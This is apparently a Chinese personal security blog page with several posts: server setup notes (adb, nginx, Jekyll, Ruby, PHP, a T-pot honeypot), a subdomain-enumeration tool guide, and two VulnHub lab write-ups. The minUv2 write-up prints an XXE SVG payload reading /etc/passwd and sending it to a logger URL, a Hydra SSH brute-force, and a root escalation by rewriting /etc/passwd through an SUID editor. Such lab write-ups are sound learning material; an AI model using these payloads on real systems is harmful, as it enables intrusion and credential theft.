E/WifiStateMachine(  509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55
E/WifiStateMachine(  509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55
E/WifiStateMachine(  509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55
E/WifiStateMachine(  509): WifiStateMachine shouldSwitchNetwork  txSuccessRate=-0.00 rxSuccessRate=-0.00 delta 999 -> 999
E/WifiStateMachine(  509): CMD_AUTO_ROAM sup state CompletedState my state ConnectedState nid=0 config "lgrut25642"NONE roam=1 to any targetRoamBSSID any
E/WifiStateMachine(  509): AUTO_ROAM nothing to do
E/WifiStateMachine(  509): WifiStateMachine CMD_START_SCAN source -2 txSuccessRate=-0.00 rxSuccessRate=-0.00 targetRoamBSSID=any RSSI=-55

6.adb install

[-lrtsd]

安装1.apk命令(在pc端,且1.apk为绝对路径)
$ adb install 1.apk
3480 KB/s (54687952 bytes in 15.344s)
        pkg: /data/local/tmp/1.apk
Success

7.adb uninstall

[-k] - remove this app package from the device ('-k' means keep the data and cache directories)

$ adb uninstall [-k] com.com.pack
  	Success
  	-k参数值保存安装数据和缓存。

8.adb help

- show this help message;显示帮助信息

9.adb version

- show version num;显示版本号

————————华丽分割线——————————


以上,记录。

[Read More]

nginx和jekyll

Nov 22, 2019. | By: Bin4xin

  • 摘要:webrick真是不省心啊。还是nginx大法好~

使用nginx作为jekyll博客的服务启动容器介绍:

1.jekyll如何工作

首先先从用户角度解释一下我理解中的jekyll服务的运行原理
1.编写markdown文档->2.markdown解析->3.jekyll运行生成web站点文件

所以我们直接去找站点文件夹,把web站点文件夹复制到nginx的根目录下就好了

cd /your-jekyll-web/
ls                   #我们可以看到_site/文件夹,这个文件夹就是web站点文件夹
cd _site/
vi 2019-01-01-your-article-title.markdown
cp _site/ /var/www/html/ -r
nginx -t
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
systemctl start nginx
curl localhost

测试nginx完毕没有问题,既可以直接启动nginx。然后看一下本地页面,如果出现本地页面就是调试完成了。

2.配置nginx-server

cat /etc/nginx/nginx.conf
中间略去,直接看server区块
server {
        listen       80;
        server_name  ip;     #修改这里,如果这里你是公网ip,修改成公网ip就可以啦。
        #charset koi8-r;
        #access_log  logs/host.access.log  main;
		 
		root   /home/www/_site/;

        location / {
			 #try_files $uri $uri/ /index.php$is_args$args;
            index  index.html index.htm;
        				}
 location ~ \.php{          #这里是定位到输入php的页面解析代码,如果不需要可以直接注释掉。
				index  index.php index.html;
				include /etc/nginx/snippets/fastcgi-php.conf;
				fastcgi_pass unix:/etc/init.d/php7.3-fpm;
					}

	# deny access to .htaccess files, if Apache's document root
	# concurs with nginx's one
	#
	location ~ /\.ht {
		deny all;
		}
        #error_page  404              /404.html;

        # redirect server error pages to the static page /50x.html
        #
        error_page   500 502 503 504  /50x.html;
        #location = /50x.html {
         #   root   /usr/share/nginx/html;

		}
}

同样测试一下,没问题就可以了。 这个时候就可以看一下公网地址是不是已经可以访问上了,访问上就没什么问题了。维护博客就可以通过markdown文件的形式post到服务器上用jekyll解析就可以访问了。

希望你们自己也能动手试试看。么么哒

[Read More]

Docker环境下T-pot蜜罐部署记录

Nov 21, 2019. | By: Bin4xin

  • 摘要:最近在网上冲浪看到一个开源蜜罐项目,看到是基于web的蜜罐项目,web页面是真好看。突发奇想正好手头有个公网ip,最近也在为论文数据来源发愁,索性来试试看。
    • 先说结论,安装失败。本篇持续更新~(滑稽)
    • 看介绍项目的帖子说,最新版T-pot 18是基于ubuntu server 18.04 TLS进行部署。果断使用docker试试~

1.docker安装使用

1.1使用apt-get进行安装

安装必要的一些系统工具

sudo apt-get update
sudo apt-get -y install apt-transport-https ca-certificates curl software-properties-common

安装GPG证书

curl -fsSL http://mirrors.aliyun.com/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
写入软件源信息
sudo add-apt-repository "deb [arch=amd64] http://mirrors.aliyun.com/docker-ce/linux/ubuntu $(lsb_release -cs) stable"

更新并安装 Docker-CE

sudo apt-get -y update
sudo apt-get -y install docker-ce

2.docker使用语法

#查看当前环境下docker拥有的镜像
docker images 
#使用宿主机80端口映射且运行ubuntu镜像,镜像使用bash执行
docker run -it -p 80:80 ubuntu /bin/bash
#保存指令,由于docker不会进行容器修改的保存,所以需要手动保存
docker commit -a "runoob.com" -m "my apache" a404c6c174a2  mymysql:v1
#运行保存的容器
docker run -it -p 80:80 ubuntu:v1 

3.docker中netselect-apt报错.

3.1 安装netselect-apt依赖的netselect包

安装netselect之前无法安装netselect-apt,会报错。即netselect是必须依赖项

安装netselect_0.3.ds1-28+b1_amd64.deb
wget http://ftp.cn.debian.org/debian/pool/main/n/netselect/netselect_0.3.ds1-28+b1_amd64.deb
dpkg -i netselect_0.3.ds1-28+b1_amd64.deb

3.2 netselect包安装报错

以下两个是本菜docker安装时出现的依赖项,贴出来,基本上就是缺什么装什么就行了。

解决"Can't locate Term/ReadLine.pm" 
安装:apt install libterm-readkey-perl -y
解决"No usable dialog-like program is installed" 
安装:apt install dialog

3.3 安装netselect-apt包

wget http://ftp.cn.debian.org/debian/pool/main/n/netselect/netselect-apt_0.3.ds1-28_all.deb
dpkg -i netselect-apt_0.3.ds1-28_all.deb

安装结束应无任何报错,即代表成功;也可以通过输入两个包进行验证。

4.安装T-POT蜜罐

cd tpotce/iso/install
./install.sh --type=auto --conf=tpot.conf #自动编译配置,配置文件为tpot.conf
cp tpot.conf.dist tpot.conf #生成配置文件

报错 Aborting:debian bionic is not support.看样子是系统版本的问题,无法解决。~搞了一下午,脑阔疼。

[Read More]

  • 申明:背景图来自微博@胡歌,侵删~不过胡歌这么可爱应该不会介意的

第一个问题:这玩意儿是什么?通俗的来讲:
Jekyll = web server + static blog + front end UI
如果你想拥有一个自己的博客但是苦于数据库没学好,你可以来试试看;再如果想学前端,你也可以试试看~

做配置前请默念三遍四者之间的关系,保证倒背如流在进行下一步:

1.Ruby 是语言。
2.gem 是一组 Ruby 程序,类似于「包」的概念。
3.RubyGems 是 Ruby 的包管理器,用来管理和安装 gems 的。
4.bundle是用来管理gems的项目,确保能够正确地安装项目依赖,确保能够运行正确的包。

1. RVM 安装

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
##如果上面秘钥导入失败会提示command建议,直接复制下来,实在不行找不到使用下面这个链接下载。
curl -L https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable
source /usr/local/rvm/scripts/rvm  ##配置一次性变量,这里terminal暂时使用一下。熟悉的朋友可以直接配进bashrc自启

期间会安装各种依赖包,等待一段时间后出现complete字样即成功安装。

2. ruby 安装

2.1 切换rvm源

接着就是换源,老外网真的慢- -没办法,跟linux换源是一个道理

#echo "ruby_url=https://cache.ruby-china.org/pub/ruby" > ~/.rvm/user/db
#此处本菜机子的是.rvmrc,直接把url导入:
#echo "ruby_url=https://cache.ruby-china.org/pub/ruby" > /root/.rvmrc

========================2020-03-31更新:换源文件=================================
+==============================================================================+
|echo "ruby_url=https://cache.ruby-china.com/pub/ruby" > /usr/local/rvm/user/db|
+==============================================================================+

找不到更新rvm源的文件,如果是按照上面方法,基本是在上面这个文件下。

[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# echo "ruby_url=https://cache.ruby-china.com/pub/ruby" > /usr/local/rvm/user/db
[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# cat db
ruby_url=https://cache.ruby-china.com/pub/ruby

[root@iZ2ze9ebgot9gy5c2mi5ecZ user]# rvm install "ruby-2.5.7"
Searching for binary rubies, this might take some time.
No binary rubies available for: centos/7/x86_64/ruby-2.5.7.
Continuing with compilation. Please read 'rvm help mount' to get more information on binary rubies.
Checking requirements for centos.
Requirements installation successful.
Installing Ruby from source to: /usr/local/rvm/rubies/ruby-2.5.7, this may take a while depending on your cpu(s)...
ruby-2.5.7 - #downloading ruby-2.5.7, this may take a while depending on your connection...
** Resuming transfer from byte position 323584
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 12.8M  100 12.8M    0     0  6097k      0  0:00:02  0:00:02 --:--:-- 6095k
ruby-2.5.7 - #extracting ruby-2.5.7 to /usr/local/rvm/src/ruby-2.5.7.....
ruby-2.5.7 - #configuring...................................................................
ruby-2.5.7 - #post-configuration..
ruby-2.5.7 - #compiling..................................................................................
ruby-2.5.7 - #installing..............................
ruby-2.5.7 - #making binaries executable..
ruby-2.5.7 - #downloading rubygems-3.0.8
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 25  867k   25  223k    0     0  15138      0  0:00:58  0:00:15  0:00:43 16300

ruby-2.5.7 - #adjusting #shebangs for (gem irb erb ri rdoc testrb rake).
Install of ruby-2.5.7 - #complete
Ruby was built without documentation, to build it run: rvm docs generate-ri

基本上看到上面的complete就安装完了

#安装ruby rvm list know #查询已知rvm软件列表 rvm install “ruby-2.5.5” #安装ruby rvm use 2.5.5 #指定使用的ruby版本号

3. 配置ruby-gems环境

#配置前确认:
rvm -v
rvm 1.29.9 (latest) by Michal Papis, Piotr Kuczynski, Wayne E. Seguin [https://rvm.io]
gem -v
3.0.6
ruby -v
ruby -v
ruby 2.5.5p157 (2019-03-15 revision 67260) [x86_64-linux]
gem source -l
gem sources --remove https://rubygems.org/
gem sources -a https://gems.ruby-china.com  ##换源 换源 换源
gem update --system
gem install bundler

4. 安装jekyll

gem install jekyll 安装jekyll工具,保证jekyll能顺畅运行。此处跟每个人下载的模板不一样所需要的工具不一样,我这里把基本的一些工具贴上,后期模板不一样看一下环境要求根据要求即可。

gem install bundler      #打包用工具
gem install jekyll-paginate #分页设置工具 重要 一定要安装
gem install minima      #默认主题
gem install jekyll-feed #订阅用的工具

bundle?

% sudo bundle exec rake production:export
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
fatal: 不是一个 git 仓库(或者任何父目录):.git
Could not find rake-10.5.0 in any of the sources
Run `bundle install` to install missing gems.

到你所在的博客目录下,git init

bin4xin@bin4xin's MacbookPro text-theme % pwd
/Users/bin4xin/blog/text-theme
bin4xin@bin4xin's MacbookPro text-theme % git init
已初始化空的 Git 仓库于 /Users/bin4xin/blog/text-theme/.git/
% bundle config mirror.https://rubygems.org https://gems.ruby-china.com
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
bin4xin@bin4xin's MacbookPro text-theme % sudo bundle install                                                  
/System/Library/Frameworks/Ruby.framework/Versions/2.6/usr/lib/ruby/2.6.0/universal-darwin19/rbconfig.rb:229: warning: Insecure world writable dir /usr/local/sbin in PATH, mode 040777
Don't run Bundler as root. Bundler can ask for sudo if it is needed, and installing your bundle as root will break this application for all
non-root users on this machine.
Fetching gem metadata from https://gems.ruby-china.com/...........
Fetching rake 10.5.0
Installing rake 10.5.0
Fetching concurrent-ruby 1.1.5
Installing concurrent-ruby 1.1.5
Fetching i18n 1.7.0
Installing i18n 1.7.0
··省略
··
··
Fetching sassc 2.2.1
Installing sassc 2.2.1 with native extensions

Bundle complete! 3 Gemfile dependencies, 42 gems now installed.

5. 启动服务

一般你们都是直接下载了模板,模板解压后进入文件夹即可。比如我这里模板文件夹叫blog

unzip blog.zip
cd blog/
git init #如果你有多个模板,记得先用这个命令,把当前文件夹当做根目录;同理使用其他模板第一步输入这个命令
jekyll serve -P 80   #自动构建并运行jekyll服务

6. jekyll报错

Could not find gem 'X' in any of the gem sources listed in your Gemfile.(Bundler::GemNotFound)
gem install X
安装即可
  • 1.jekyll-paginate使用失败 即使是安装了jekyll-paginate,也会报错。
    • gem list –local | grep jekyll-paginate #查看本地gem安装插件 确认安装上,在博客根目录下编辑Gemfile,添加:gem ‘jekyll-paginate’, group: :jekyll_plugins
  • 2.cannot load such file – kramdown-parser-gfm (LoadError)
    • 安装即可。安装 kramdown-parser-gfm ,不要分开一个一个安装。

现在jekyll服务启动后,web的服务是使用WEBrick服务器,会有以下让我觉得不舒服的地方:
1)目录遍历
2)无法隐藏服务器版本号 (也许是能够这样操作但是我没有发现),所以试了下发现nginx也是可以的

传送门

以上。

[Read More]

  • 声明:本文章首发于华为云鲲鹏社区,同步于作者个人博客:)

鲲鹏云服务器Ubuntu 18.04 64bit with ARM

PHP+NGINX软链接演示

摘要:华为云社区的活动好多~最近领了个ARM云服务器。打算用服务器搭建一个云存储服务容器方便自己上传论文,说干就干,于是就是在网上找了个开源的项目。下载压缩包下来完事,发现没有php环境,得自己配置。行吧,自己配。


1.安装nginx网站服务器

1.1 换源

安装web前记得先把源换一下,ubuntu的官方源我也测试了,确实有点慢。注意换源要换成ARM的版本。这个本菜换的源供大家参考。

##ubuntu-ports里面有arm64的源
#切记换掉源~
vi /etc/apt/sources.list
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-security main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-updates main multiverse restricted universe
deb http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-backports main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-security main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-updates main multiverse restricted universe
deb-src http://mirrors.tuna.tsinghua.edu.cn/ubuntu-ports/ xenial-backports main multiverse restricted universe
sudo apt update
#等待apt更新完成即可,列表更新完成就可以tab补全啦~

1.2 安装

sudo apt install nginx
ps -ef |grep nginx #查看进程
curl localhost       #本地调试出现welcome页面即本地调试成功

1573702475503227.png

如果想要公网访问ip需开放入方向安全规则80端口。找到控制台-入方向规则-添加规则

1573702674499363.png

访问公网ip即可。

2.安装php、配置nginx解析

2.1 php安装

sudo apt install php-fpm  ##这里注意查看一下php-fpm的管理器版本,后面配置软链接如果版本不一致会报错
# cd /var/run/php/
# ls
php7.0-fpm.pid  php7.0-fpm.sock  ##可以看到此处本菜的版本是7.0

2.2 最重要的nginx软链接解析

进入/etc/nginx/sites-available 目录下新建webserver,配置php解析文件。

2.3 在server区块中配置基本服务

server {
        listen 80;            ##网站监听端口,这里设置为80,即浏览器默认的HTTP端口号。
        root /var/www/html;   ##网站根目录
        index index.php index.html index.htm index.nginx-debian.html;  ##配置web默认页
        server_name ip##你的公网ip;

        location / {
                try_files $uri $uri/ =404;                                                    
        }

        location ~ \.php$ {         ##如果url输入为php后缀文件则传给php-fpm进行处理。
                include snippets/fastcgi-php.conf;
                fastcgi_pass unix:/var/run/php/php7.0-fpm.sock;  ##注意此处的解析目录的更改
        }

        location ~ /\.ht {
                deny all;               ##该区块禁止.htaccess的访问。
        }
}

2.4 配置nginx软链接

如果报错无法找到webserver(此处每人不同,如果未修改则是default),进入/etc/nginx/sites-enabled目录下查看软链接配置,删除多余配置,留下default和webserver软链接文件

sudo ln -s /etc/nginx/sites-available/webserver /etc/nginx/sites-enabled/ 
sudo nginx -t                  #nginx测试,无报错进入下一步
sudo systemctl reload nginx    #重启服务,载入最新配置

报错解决:

/etc/nginx/sites-enabled# ll
total 8
drwxr-xr-x 2 root root 4096 Nov 12 11:03 ./
drwxr-xr-x 6 root root 4096 Nov 12 11:34 ../
lrwxrwxrwx 1 root root   34 Nov 12 10:51 default -&gt; /etc/nginx/sites-available/default
lrwxrwxrwx 1 root root   34 Nov 12 11:02 webserver -&gt; /etc/nginx/sites-available/webserver
rm -rf webserver
sudo ln -s /etc/nginx/sites-available/webserver /etc/nginx/sites-enabled/ 

3.测试

在web服务目录下创建php文件测试。

sudo vi test.php
&lt;?phpphpinfo();?>

使用浏览器输入:$_公网ip/test.php;测试成功:

1573709110895993.png

4.部署存储容器

别忘了我们的最终目的,是部署云服务器容器。将web文件夹解压至web根目录下。访问即可。 由于此处使用的是第三方开源容器项目,所以安全性无法保障,不保证后门等情况不会发生,所以介意者可以自行搭建(代码托管平台也有)。为了避免麻烦这里把所有的与项目有关的信息码一下,见谅。

1573709423926504.png

1573709541736321.png


1573709994134345.png

好了。基本上一个自己使用的云存储容器就可以投入使用了。手机端、PC端都可以使用。建议大家可以自己尝试一下。
么么哒

[Read More]

摘要:之前在暑假里申请注册了个云先知平台账号,平时没事闲(mo)着(yang)的(gong)时候当当土拨鼠挖挖洞。挖过的都懂,是一个类似于渗透测试的中心化平台。乙方公司有这个需求,通过这个平台发放任务,通过不同的漏洞等级【严重】-【高危】-【中危】-【低危】,严重就是危及到服务器权限,能够get web shell、root甚至横向渗透,依次类推每一项,危及程度依次类推,有兴趣的朋友自行搜索体会(你们可以猜猜xss在哪个位置)。

以上背景,每份任务都会规定好一些任务域名,指定好。其他的域名没有备案不允许碰。如:

重点就来了,前面的*,是需要我们自己去测试的,也就是说,不同的 * 会有别样的惊喜。

那么这就推出咱们的主角:findomain,跨平台的子域名搜集工具。

1.下载安装

    $ git clone https://github.com/Edu4rdSHL/findomain.git

    $ cd findomain

    $ apt-get install cargo

    $ cargo build --release

    $ sudo cp target/release/findomain  /usr/bin

    $ findomain

2.语法介绍

1、进行简单的子域名搜索,并输出信息:
  findomain -t example.com

2、使用所有的API进行子域名搜索,并输出信息:
findomain -t example.com –a

3、搜索子域名,并将输出导出为CSV文件格式:
findomain -t example.com -o csv

4、使用所有的API进行子域名搜索,并将输出导出为CSV文件格式:
findomain -t example.com -a -o csv

3.实际使用

  $ findomain -t a****un.com -o csv

   $ Target ==> a****un.com

    Searching in the CertSpotter API...
    Searching in the Bufferover API...
    Searching in the Crtsh database...
    Searching in the Virustotal API...
    Searching in the Sublist3r API...
    Searching in the Facebook API...
    Searching in the Threadcrowd API...
    Searching in the Spyse API...
    An error ❌ has occurred while parsing the JSON obtained from the Threadcrowd API. Error description: JSON error.

    An error ❌ has occurred while parsing the JSON obtained from the Bufferover API. Error description: JSON error.

    An error ❌ has occurred while parsing the JSON obtained from the Sublist3r API. Error description: JSON error.

    A timeout ⏳ error has occurred while processing the request in the Facebook API. Error description: timed out


    A total of `153` subdomains were found for ==>  a***un.com

    Good luck Hax0r !

    >>  Filename for the target aliyun.com was saved in: ./a*****n.com_1680.csv

可以看到 A total of 153 subdomains.所以使用findomain工具一共搜集到了153个子域名。最后,goodluck。 且输出的csv文件就输出在运行工具的当前文件夹下。推荐大家可以试试看,搜集信息还是很好用的,么么哒

[Read More]

「渗透」SVG的神秘力量:minUv2

Sep 1, 2019. | By: Bin4xin

序言

hello,各位。最近闲来无事,工作之余偷偷用公司电脑测试入侵了一个linux靶机,遂记录下。(手动狗头) 这个靶机本身难度适中,复现了svg的代码执行漏洞且要求对linux的系统命令较为熟悉;svg大体来说是一种图像文件格式,基于XML,由W3C联盟进行开发的,支持网页打开,编辑方便等。可以自行深入搜索~各位大佬见笑。

一、靶机简介

minUv2下载地址:
Download (Mirror)
Download (Torrent)

二、实战

江湖规矩,神器开路:首先先用Nmap扫描确定靶机地址。发现靶机ip。 这里靶机只支持vbox,所以得桥接通信,打码请谅解~

确定ip直接端口扫描~ 发现只开放了两个端口:22、3306端口。22端口暂时先放着不管,咱们看看3306端口。 是一个web页面,emmmm.主角登场,svg图像~

三、发现漏洞

小弟赶紧dirb扫描一波,果然有发现。

#扫描3306端口下的html后缀的文件
dirb http://$_ip:port -X .html
--------------
+ http://$_ip:port/upload.html (CODE:200|SIZE:908)
--------------
DOWNLOADED: 4612 - FOUND: 1

发现了上传网页,且只能上传svg、img文件,又惊又喜。exp搜索一哈找到poc,验证一下漏洞的存在。poc代码如下:

#poc上传上去页面回显
#<!DOCTYPE svg [
<!ELEMENT svg ANY >
<!ENTITY xxe SYSTEM "/etc/passwd">
]>
<svg version="1.0" xmlns="http://www.w3.org/2000/svg" width="19000px" xmlns:xlink="http://www.w3.org/1999/xlink" >
<text x="-1000" y="-1000" >&xxe;</text>
<circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" 		fill="red" />
<script>
var logger = "http://localhost/?file=" +
encodeURIComponent(document.getElementsByTagName("text")	[0].innerHTML);
document.createElementNS('http://www.w3.org/2000/svg','image').setAttributeNS('http://www.w3.org/1999/xlink','href', logger);
</script></svg>


果然有xxe漏洞,但是验证了漏洞不能让我们有实际的渗透进展,只能对一些文件内容进行查看,无法得到shell,要怎么办呢?

四、get shell

就在小弟愁眉苦脸的时候,忽然看到最后一行用户名的进程是/bin/ash,想到bash shell会有历史纪录,赶紧重新上传一个poc验证想法。回显内容:

"./ash.history"获取~
Useradd D bossdonttrackme p superultrapass3

根据所得的内容生成用户字典(passwd回显的用户名),密码字典。用Hydra跑一下。

##hydra -L /root/Documents/test/minu/use.txt -P /root/Documents/test/minu/passwd.txt ssh://$_ip
Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or 
secret service organizations, or for illegal purposes.
[WARNING] Many SSH configurations limit the number of parallel tasks, it is
recommended to reduce the tasks: use -t 4	[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:30/p:1), ~2 tries per task
[DATA] attacking ssh://$_ip:22/
[22][ssh] host: $_ip ** login: employee password: superultrapass3**
1 of 1 target successfully completed, 1 valid password found
##跑出来账号密码employee:uperultrapass3,ssh连上去。
##连接上去查看一下基本信息 
ssh employee@ip
whoami
id | find -perm -4000 2>/dev/null

五、提权

发现microbbsuid不需要高权限,运行一下,发现micro是一个文本编辑工具器。接下来就简单了。

#生成一份hash值,替换掉passwd的用户密码,这样密码就已知了。
#用micro编辑器打开passwd文件,替换root密码保存即可
passwd -1 -salty root admin123(随意)
cat /etc/passwd |/usr/bin/micro

这样我们就已知root密码了,直接切换用户

minuv2:~$ su root
Password: 
minuv2:/home/employee# whoami
root
minuv2:/home/employee#

获得flag~感谢各位

[Read More]

序言

hello,各位看官。最近忙里偷闲花了两天时间测试入侵了一个linux靶机,遂记录下。这个靶机我觉得挺适合刚入门的有一些基础的白帽子,对就是你!,大部分flag都是利用一些工具来获得。大佬看客笑看便是(手动狗头)。 整篇记录的都是小弟的思路,看官们跟着小弟的思路看就是了,会有些乱。见笑。

一、靶机

靶机来自vulnhub,下载地址如下:

PumpkinRaising:
Download (Mirror): https://download.vulnhub.com/missionpumpkin/PumpkinRaising.ova
Download (Torrent): https://download.vulnhub.com/missionpumpkin/PumpkinRaising.ova.torrent

二、实战

2.1 端口扫描

江湖规矩,神器开路:首先先用Nmap扫描确定靶机地址。发现开放的靶机ip。

扫描一波(-O -A狗头):

咱们发现没有多余的端口开放,中规中矩,22,80端口。附带扫出80端口下的robots.txt。小弟一个激灵,这么多?心里美滋滋一个一个打开看,不急,这次怕是十拿九稳(狗头)。22端口先不管他,小弟看到这么多内容的robots文件夹,如获至宝赶紧打开,我的乖,目录图片文件路径,先看看文件选项有没有什么线索。

2.2 端口“踩点”——顺藤摸瓜

小弟试下来后发现文件只有如下能够访问: 1)underconstruction.html: (页面名意还在建设的页面)提示我们说图片下面有猫腻。咱们先把这个uc.gif图片下载下来试试水。
正好小弟最近在研究图片隐写,丢到Stegsolve查看一波。跟普通图片差不多Alpha P 1-7都是空白 翻了又翻觉得RedP6、7有点异常,打开数据抽取查看源码没有收获(原谅小弟,小弟是noob~);尝试了GRB各种组合,各种低0位,也尝试了提取bin都未提取出有用的信息。
忽然想到这个图片是gif,会不会有偏移呢?赶紧Stereogram Slover尝试偏移,不出所料也失败了,就这样在这张图片上浪费了不少时间。
既然找不到有用的信息,那么这张图片先放一放。。不急,先往后面看。继续通过robots文件的内容查看。

2)hidden目录的note文本 hidden目录下的note文本文件,显示了一些貌似账号密码的文本,难道是ssh的账号信息?不会这么简单吧,虽然嘴上说着不会,身体却很诚实去试了试,不行。。但是我们到现在还没有发现类似登陆页面的东西,也先放一放。

3) /seeds/seed.txt.gpg 访问后直接下载下来了,gpg?下载下来打开乱码,谷歌一哈搜到几个工具,我这里用的是kali的gpg(没用过可以自行百度有教程安装,几百K)

花了点时间摸索了一下发现了线索
看着像摩斯密码,丢到摩斯解密工具里解密,就这样小弟居然得到了第一个flag(id):69507

2.3 言归正传——80端口

咱们再来看看主页有些啥。80端口下静态页面~ 查看源码,得到两个有用的信息: 一段看上去像base64的密文,赶紧丢到解密工具解密,没有什么有用的信息:This is just to remaind you that it's Level 2 of Mission-Pumpkin! ;) 继续,一个url,转向pumpkin.html 又是一串注释掉的密文字符串,丢base64解不出,试试base32解。
解密为:/scripts/spy.pacp,访问一哈,下载下来一个tcp包文件,wireshark打开,随意点一个带有push字的包
发现明文传输,毫不犹豫追踪TCP流,发现ID:50609~lucky,不错哟
重点来了:别忘了上面pumpkin.html右边的滑块,拉到底发现被注释掉的十六进制的数组,用网站工具解密,找到Seeds ID: 96454(本人习惯比较差,不喜欢f12,所以这个点真的后知后觉才发现,小声bb)
终于功夫不负有心人,已经解出三个id,根据作者靶机下载页面的提示一共有四个id。总结一下,还有一张gif图片藏着一个id,解密出来再加上已经解密出的三个id,就大功告成了。(这么自信?) 既然Stegsolve试了不行咱们就换一个,使用stegosuite解密,试了一下需要密码,忽然想到之前hidden目录下奇怪的字符,赶紧复制下来一个一个试,还是不行,提示密码错误。难受~难道是图片错了?果然,在小弟的坚持不懈的努力下,发现了猫腻。猫腻不在于图片下的隐写,而在于哪张图片。。。最后隐写图片是那张jackolatantern.gif。(靶机作者已经被我吐槽一万遍)
提取文本,得到id:86568

2.4 id已齐,LetsGo

就这样,一共找到四个seeds id: 69507 96454 50609 86568 接着小弟看着这个四个id,猜测用户名jack并且陷入了深深的沉思,到底是用msf跑呢,还是海德拉~没错小弟就是这么纠结- -(脚本是python的内建函数写的文尾附上)

三、组合拳——ssh,提权

最后还是用了最爱的msf跑出来密码(先用脚本组合四个id的不同组合即可),如图跑出来了。下一步ssh连吧。
ssh -l jack pass
继续行云流水,sudo su。不行?最后参考资料提到权限。省去exp提权~

四、总结

总结下来,此次这个靶机的入侵过程虽然有些曲折,本菜也被误导到不少坑里~但是总体来说都不是很难,没有让我们来挖洞找页面漏洞来弹webshell,所以小弟认为比较适合一些有渗透基础的玩家~(对,就是我没错)。

参考资料

https://www.360zhijia.com/anquan/413205.html 随机组合脚本:

#a,b,c,d代替即可,别忘了python严格的缩进~
import itertools
	for i in itertools.permutations([a,b,c,d],4):
	print(i)

have fun!guys.why not do it yourself?

[Read More]

本站由哨兵安全实验室支持创办

个人感谢@TUNA协会的开源代码

Powered by Bin4xin & 这里是开源代码库.

有个不成熟的建议?联系:

The best team on the planet.